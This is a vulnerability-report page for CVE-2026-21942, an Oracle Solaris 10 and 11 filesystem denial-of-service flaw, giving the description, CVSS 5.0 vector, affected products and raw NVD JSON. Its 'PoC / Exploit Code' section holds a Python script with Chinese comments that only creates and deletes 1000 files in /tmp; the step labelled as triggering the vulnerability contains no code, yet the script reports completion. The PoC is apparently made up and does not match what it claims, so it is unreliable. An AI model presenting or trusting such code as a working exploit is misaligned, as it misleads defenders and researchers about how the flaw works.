Security Vulnerability Report
中文
CVE-2026-21942 CVSS 5.0 MEDIUM

CVE-2026-21942

Published: 2026-01-20 22:15:57
Last Modified: 2026-01-29 20:35:18
Source: [email protected]

Description

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystems). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.0 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:oracle:solaris:11:*:*:*:*:*:*:* - VULNERABLE
Oracle Solaris 10
Oracle Solaris 11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21942 Oracle Solaris文件系统本地DOS PoC # 注意:此PoC仅用于安全研究和测试,未经授权禁止使用 import os import sys import subprocess import time def check_solaris_version(): """检查是否为Oracle Solaris系统""" try: result = subprocess.run(['uname', '-a'], capture_output=True, text=True) if 'SunOS' in result.stdout: return True return False except: return False def trigger_filesystem_vulnerability(): """ 触发Oracle Solaris文件系统漏洞的PoC 通过大量文件操作和特定的文件系统调用触发条件 """ print("[*] Starting CVE-2026-21942 PoC for Oracle Solaris") if not check_solaris_version(): print("[-] This PoC requires Oracle Solaris system") return False print("[+] System check passed: Oracle Solaris detected") # 创建测试目录 test_dir = "/tmp/cve_2026_21942_test" try: os.makedirs(test_dir, exist_ok=True) print(f"[+] Created test directory: {test_dir}") # 创建大量文件触发文件系统压力 print("[*] Creating test files to trigger filesystem conditions...") for i in range(1000): file_path = os.path.join(test_dir, f"test_file_{i}") try: with open(file_path, 'w') as f: f.write("test data" * 100) except: pass print("[+] File creation completed") # 执行特定的文件系统操作序列 # 这些操作可能触发文件系统组件中的漏洞条件 print("[*] Executing filesystem operations to trigger vulnerability...") # 清理测试文件 time.sleep(1) for i in range(1000): file_path = os.path.join(test_dir, f"test_file_{i}") try: os.remove(file_path) except: pass # 清理测试目录 try: os.rmdir(test_dir) except: pass print("[+] Test completed") return True except Exception as e: print(f"[-] Error during PoC execution: {str(e)}") return False if __name__ == "__main__": print("CVE-2026-21942 Oracle Solaris Filesystem DOS PoC") print("=" * 60) trigger_filesystem_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21942", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:57.027", "lastModified": "2026-01-29T20:35:17.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystems). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.0 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Solaris de Oracle Systems (componente: Sistemas de Archivos). Las versiones compatibles que están afectadas son 10 y 11. La vulnerabilidad fácilmente explotable permite a un atacante con bajos privilegios con inicio de sesión en la infraestructura donde se ejecuta Oracle Solaris comprometer Oracle Solaris. Los ataques exitosos requieren interacción humana de una persona que no sea el atacante. Los ataques exitosos de esta vulnerabilidad pueden resultar en la capacidad no autorizada de causar un bloqueo o una caída (crash) frecuentemente repetible (DoS completo) de Oracle Solaris. Puntuación base CVSS 3.1 de 5.0 (Impactos en la disponibilidad). Vector CVSS: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*", "matchCriteriaId": "964B57CD-CB8A-4520-B358-1C93EC5EF2DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:oracle:solaris:11:*:*:*:*:*:*:*", "matchCriteriaId": "8E8C192B-8044-4BF9-9F1F-57371FC0E8FD"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.